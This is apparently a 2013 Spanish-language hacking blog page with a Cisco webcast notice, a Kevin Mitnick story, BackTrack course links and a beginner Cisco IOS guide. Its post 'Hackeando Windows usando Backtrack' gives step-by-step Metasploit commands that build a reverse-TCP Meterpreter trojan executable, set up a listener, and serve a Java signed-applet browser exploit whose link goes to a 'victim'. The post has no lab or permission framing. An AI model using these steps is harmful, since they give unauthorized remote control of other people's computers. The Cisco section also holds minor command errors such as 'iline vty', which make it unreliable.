Comunidad PeruCrack 2015!

Comunidad Informatica PeruCrack! de Informaticos para Informaticos!

Ethical Hacking

Visita la seccion de noticias, guias, videos, y mucho mas relacionado al mundo de la inSeguridad Informatica

Ingresa a las redes sociales de la comunidad

Visita nuestro Facebook oficial, siguenos en twitter y suscribete al canal de Youtube!

Networking

Los mejores tutoriales e informacion sobre redes informaticas. Preparate para tus examenes de certificacion.

Podcast PeruCrack

Escucha las grabaciones de los mejores Podcast de la comunidad.

lunes, 25 de noviembre de 2013

Webcast gratuito Cisco LatinoAmerica 26/11/2013

Mañana ( 26/11/2013) se estara realizando el Webcast gratuito de Cisco LatinoAmerica en el que exponen temas y resuelven dudas relacionadas al routing y switching en Cisco Ios



Durante este evento en vivo, el experto de Cisco Arturo Morales explicará el funcionamiento de Routing y Switching sobre la arquitectura de IOS, dará una introducción al tema y contestará dudas a cerca del mismo.

Arturo Morales Colmenares es ingeniero de soporte de Cisco HTTS (High Touch Technical Support) en el grupo de asistencia técnica de LATAM en la ciudad de México. Arturo inició en Cisco hace 5 años como HTE (High Touch Engineer) para la cuenta de Telmex. Está especializado en Core Network, tiene conocimientos sobre Redes Opticas (SDH y DWDM), Redes IP y ha trabajado en empresas como ALU, Global Crossing, HUAWE y Bestel. Actualmente se enfoca en tecnologías backbone para IP Core Network. Arturo Es egresado del Instituto Politécnico Nacional (ESIME - Zacatenco) donde estudió Ingeniería en Comunicaciones y Electrónica. Cuenta con certificaciones: CCNA, CCNP, CCIP, ITIL. 

Para registrarse en el evento simplemente visiten el siguiente enlace :

http://tools.cisco.com/gems/cust/customerSite.do?METHOD=E&LANGUAGE_ID=S&SEMINAR_CODE=S19403&PRIORITY_CODE=%20#


------------------------------------------------------------------------------------------------------------------------------
Sobre el autor : 




Me llamo Roger Menendez y tengo 20 años. Informatico desde que tengo uso de razon me interesa investigar sobre temas de Seguridad informatica, Programacion, Scripting, Networking y Software libre. Tengo mas de 4 años de experiencia laboral en temas relacionado a lo que escribo y mas de 10 años leyendo e investigando sobre este mundo que tanto nos gusta! 

------------------------------------------------------------------------------------------------------------------------------

Hackeando Windows usando Backtrack

Recopilo este antiguo post utilizado para penetrar sistemas operativos Windows en sus versiones XP, 7 y hasta 8 usando la poderosa herramienta Metasploit. Para ello usaremos 2 métodos los cuales serán explicados en detalle para su puesta a prueba 



1.- Creando Troyanos

Primero debemos definir ¿Que es un Troyano?

Segun Wiki : En informática,se denomina troyano o caballo de Troya (traducción literal del inglés Trojan horse) a un software malicioso que se presenta al usuario como un programa aparentemente legítimo e inofensivo pero al ejecutarlo le brinda a un atacante acceso remoto al equipo infectado. En resumen, lo que haremos aquí es elaborar un archivo que al ser ejecutado en un equipo remoto podremos tomar control del mismo desde nuestro equipo atacante

Segundo definiremos Que es un exploit?

Es un conjunto de comandos definidos que usualmente trabajan con metasploit que cumplen el objetivo de explotar una vulnerabilidad determinada.

Ahora si empecemos crackeros!

Abrimos la consola y escribimos el popular comando


msfconsole



Ahora introducimos el siguiente comando :


msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.67 LPORT=445 x > /root/exploit.exe 

Analizando el comando podemos deducir lo siguiente :
LHOST : Ip local desde donde ejecutaremos como "servidor" el troyano
LPORT : Puerto usado, en este caso 445
root/exploit.exe: directorio y ejecutable creado

Seguimos?
Bien ahora activamos el handler usando el comando

use exploit/multi/handler

Ahora, que es un Handler?

En Metasploit, un handler es lo que utilizamos para conectar con un destino. Dependiendo del payload, el handler quedará a la escucha esperando una conexión por parte del payload (reverse payload) o iniciará una conexión contra un host en un puerto especificado (caso de un bind payload).

set payload windows/meterpreter/reverse_tcp 

Con este comando lo que hacemos es configurar el payload para que este listo para el ataque

set lhost  (tu ip, ejemplo 192.168.1.67)
Con este comando configuramos el lhost que como ya mencionamos es el host local y tambien podemos configurar el puerto

set lport 445


Finalmente, ingresamos el comando

exploit
Se generara el exploit (Ojo:localmente) en el directorio que especificamos anteriormente

2.- Aprovechando una vulnerabilidad remotamente

Podemos aprovechar también el descuido de un usuario común al cual en nuestro caso llamaremos "victima" y aprovecharemos una vulnerabilidad propia de una aplicación. Bueno empecemos!

Introducimos el ya famoso comando
msfconsole
 ahora usamos el exploit que atacara esa vulnerabilidad remota

 use exploit/multi/browser/java_signed_applet

Ya tenemos el exploit activo y listo para configurarlo

set srvhost
srvhost + ip : configuramos nuestra ip en este caso la ip desde donde es enciara el exploit
uripath / : Se usa para establecer una ruta fija para una peticion GET o bien aleatoria si esta NO se define.

Entonces introducimos esos 2 paramentros

Ahora activamos el payload ya conocido anteriormente :

set payload windows/meterpreter/reverse_tcp
Muy bien ahora configuraremos los parametros del payload

 set lhost + ip (puede ser la ip publica, puedes averiguarla visitando sistios como cualesmiip.com)
 ser lport 445 : El puerto que usaremos


ahora activamos el exploit

exploit

Ahora podremos mandar a nuestra victima el link publico el cual hara que nuestro exploit se active


Saludos crackeros!!


Como trolear al FBI por Kevin Mitnick

Hace poco vi este vídeo en el que Mitnick cuenta algunas de sus experiencias en la época en al que era un fugitivo de la justicia acusado por irrumpir en servidores del gobierno.. 



Para quienes no lo conocen, Kevin Mitnick es uno de los hackers mas famosos del mundo no solo por su talento con los sistemas sino que por su habilidad para la ingeniería social que usaba siendo en mi opinion esto ultimo su mejor arma.


En el vídeo cuenta como evadía al FBI irrumpiendo en los servidores móviles de los teléfonos del personal que los buscaba para saber la ubicación de cada uno de ellos y como jugaba con esta informacion para dejar "plantados" a los polis.

Veamos lo que dice Wikipedia de Kevin :

Kevin David Mitnick (nacido el 6 de agosto de 1963) es uno de los Hackers y phreakers estadounidense más famosos. Su nick o apodo fue Cóndor. También apodado por él mismo “fantasma de los cables”.

Su último arresto se produjo el 15 de febrero de 1995, tras ser acusado de entrar en algunos de los ordenadores más seguros de los Estados Unidos.2 Ya había sido procesado judicialmente en 1981, 1983 y 1987 por diversos delitos electrónicos.
El caso de Kevin Mitnick (su último encarcelamiento) alcanzó una gran popularidad entre los medios estadounidenses por la lentitud del proceso (hasta la celebración del juicio pasaron más de dos años), y las estrictas condiciones de encarcelamiento a las que estaba sometido (se le aisló del resto de los presos y se le prohibió realizar llamadas telefónicas durante un tiempo por su supuesta peligrosidad).
Tras su puesta en libertad en 2002, Kevin Mitnick se dedica a la consultoría y el asesoramiento en materia de seguridad, a través de su compañía Mitnick Security (anteriormente llamada Defensive Thinking).
La vida de Kevin Mitnick y, en especial, la persecución que condujo a su captura en 1995, han dado lugar a multitud de libros y otro material de ficción. De entre todos destaca la novela Takedown, que relata su último arresto, y de la cual han sacado una película con el mismo título, Takedown, en el año 2000.
Otra novela algo menos conocida es The Fugitive Game, escrita por Jonathan Littman. En ella también se narran los hechos acontecidos los últimos años antes de su arresto, aunque desde una perspectiva más intimista y no tan enfocada al autobombo por parte de los captores como la anterior.
Uno de los miembros del equipo que contribuyó al arresto de Mitnick fue Tsutomu Shimomura, experto en seguridad informática e hijo del profesor Osamu Shimomura, uno de los tres ganadores del Premio Nobel de Química 2008.



domingo, 24 de noviembre de 2013

Curso de Backtrack 5 en español

Creo que ya es conocido por todos la utilidad de esta poderosa distribucion en Linux para lo que son temas de Seguridad e Inseguridad informatica, nada mas y nada menos que BackTrack. En esta ocacion me hustaria comapartir con todos ustedes un curso elaborado por la OMHE (Organización Mexicana de Hackers Éticos), el cual lleva a acabo vídeo tutoriales, en los cuales enseñan como usar esta distribucion y algunas de sus herramientas.



Esta organización, representada por Hector Lopez, mejor conocido cómo @hlixaya tiene como filosofía, ser una organización reconocida a nivel nacional que impulse y desarrolle la seguridad informática y de igual manera promueva la educación en la misma.

Pueden descargar el curso usando los siguientes enlaces : 



BackTrack 5 - 1
BackTrack 5 - 2
BackTrack 5 - 3
BackTrack 5 - 4 
BackTrack 5 - 5
BackTrack 5 - 6 
BackTrack 5 - 7
BackTrack 5 - 8
BackTrack 5 - 9 

Saludos crackeros! 


------------------------------------------------------------------------------------------------------------------------------
Sobre el autor : 




Me llamo Roger Menendez y tengo 20 años. Informatico desde que tengo uso de razon me interesa investigar sobre temas de Seguridad informatica, Programacion, Scripting, Networking y Software libre. Tengo mas de 4 años de experiencia laboral en temas relacionado a lo que escribo y mas de 10 años leyendo e investigando sobre este mundo que tanto nos gusta! 

------------------------------------------------------------------------------------------------------------------------------

lunes, 4 de noviembre de 2013

Comenzando a configurar en Cisco

Hoy vamos a empezar a explicar lo mas básico a la hora de configurar un dispositivo cisco con el fin de iniciarnos en el mundo de las redes networking.

Lo primero es conocer lo mas básico y lo que vamos a usar cada momento. Existen 3 modos de configuración a la hora de estar frente a uno de estos equipos :




Modo Exec Usuario: Este modo solo permite ver información limitada de la configuración del router y no permite modificación alguna de ésta, lo identificamos porque en la consola del router figura la expresión Router> 

Modo Exec Privilegiado: Este modo permite ver en detalle la configuración del router para hacer diagnósticos y pruebas. También permite trabajar con los archivos de configuración del router, lo identificamos porque en la consola del router figura la expresión Router# para ingresar a este modo bastaa con escribir (estando en el modo exec usuario) la palabra enable 

Modo de Configuración Global: Este modo permite la configuración básica de router y permite el acceso a submodos de configuración específicos en cualquiera de las interfaces del dispositivo que estemos configurando en ese momento, lo identificamos porque en la consola del equipo figura la siguiente expresión Router(config)# para ingresar a este modo bastaa con escribir (estando en el modo exec usuario) la palabra configure terminal 

Todos estos modos de configuración tienen sus propios parámetros y lineas de comando 

Configuración básica : 

1.- Configurar un nombre al dispositivo :
Router> enable
Router# configure terminal
Router(config)# hostname Router1 (nombra al router como Router1)
Router1(config)#
Como pueden ver estaba en el modo usuario y se tuvo que pasar al modo privilegiado para luego ingresar al modo de configuración global para escribir el comando hostname + Nombrequequeremis

2.- Configurar Contraseña al dispositivo : 

Se puede configurar contraseñas a los diferentes modos de acceso que ya vimos anteriormente para ello podemos usar las siguientes lineas de configuración :

Para proteger el modo privilegiado (enable) :

Router1> enable
Router1# configure terminal
Router1(config)# enable password contraseña *
Router1(config)#

Configurando el enable password + password solo configuraremos la contraseña pero no la encriptaremos. para ello podemos usar el comando enable secret +´password con esto ya podremos encriptar la contraseña y al ver la configuracion del router esta estara encriptada. 

Con enable password :

enable password cisco

Con enable secret : 

enable secret 5 $1$mERr$hx5rVt7rPNoS4wqbXKX7m0

Como ven al configurar estos dispositivos para cualquier administrador de red en conveniente encriptar la contraseña y asi evitar que cualquier usuario con acceso fisico al equipo pueda ver estas contraseñas

Para proteger el modo telnet (vty) : 

El comando line vty 0 4 se usa para acceder a la interfaz de Telnet, donde line vty indica dicha interfaz, 0 el número de la interfaz y 4 la cantidad máxima de conexiones múltiples a partir de 0, en este caso se permiten 5 conexiones  múltiples pero podría ser una sola.


Router1> enable
Router1# config terminal
Router1(config)# iline vty 0 4
Router1(config-if)# password cisco
Router1(config-if)# login

Es importante colocar el comando login ya que con esto habilita la contraseña que vamos a usar


Configurando interfaces fastethernet :

Para poder ingresar a configurar las interfaces es necesario usar el comando interface fastethernetx/y para luego poder activar o desactivar el puerto, colocar la direccion ip que queramos, configurar el bandwich.

Router1> enable
Router1# config terminal
Router1(config)# interface fastethernet 0/0
Router1(config-if)# ip address 192.168.1.1 255.255.255.0
Router1(config-if)# no shutdown (Para activar la interfaz)
 Este solo es solo una introduccion mas adelante veremos configuraciones mas complejas y explicaremos mas a fondo el mundo